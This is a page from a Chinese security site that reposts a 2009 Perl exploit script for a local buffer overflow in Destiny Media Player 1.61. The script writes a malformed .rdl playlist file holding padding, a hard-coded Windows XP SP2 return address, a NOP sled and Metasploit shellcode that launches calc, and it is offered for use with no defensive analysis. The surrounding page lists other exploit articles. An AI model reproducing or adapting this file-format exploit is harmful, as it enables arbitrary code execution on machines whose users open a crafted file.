首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit
来源:mail[.]ganok[sh!t]gmail.com 作者:G4N0K 发布时间:2009-04-28  

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                            
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' /
                    | |_| | |__   _| | |\  | | |_| | | . \
                     \____|    |_|   |_| \_|  \___/  |_|\_\ A Mad From Iran

==============================================================================
 Destiny Media Player 1.61 (.rdl) Local Buffer Overflow Exploit
==============================================================================
 [»] Script:.............[ Destiny Media Player 1.61 ]...................
 [»] Website:............[ http://www.pirateradio.com ]..................
 [»] Today:..............[ 26042009 ]....................................
 [»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================
    [i] Double click on malformed file.
=cut

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
my $Joke = "G" x 4432;
my $Junk = "\x90" x 16;
my $RA = "\x5D\x38\x82\x7C"; #Windows XP SP2
open(MYFILE,'>>radio.rdl');
print MYFILE $Joke.$RA.$Junk.$Shcode;
close(MYFILE);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libvirt_proxy <= 0.5.1 Local P
·SDP Downloader 2.3.0 (.ASX) Lo
·linux内核CAP_KILL校验本地提权
·SDP Downloader 2.3.0 (.ASX) Lo
·Microsoft Internet Infomation
·Zoom Player Pro v.3.30 .m3u Fi
·SDP Downloader v2.3.0 (.ASX Fi
·Icewarp Merak Mail Server 9.4.
·Absolute Form Processor XE-V 1
·LightBlog <= 9.9.2 (register.p
·iodined <= 0.4.2-2 (forged DNS
·CoolPlayer Portable 2.19.1 (Sk
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved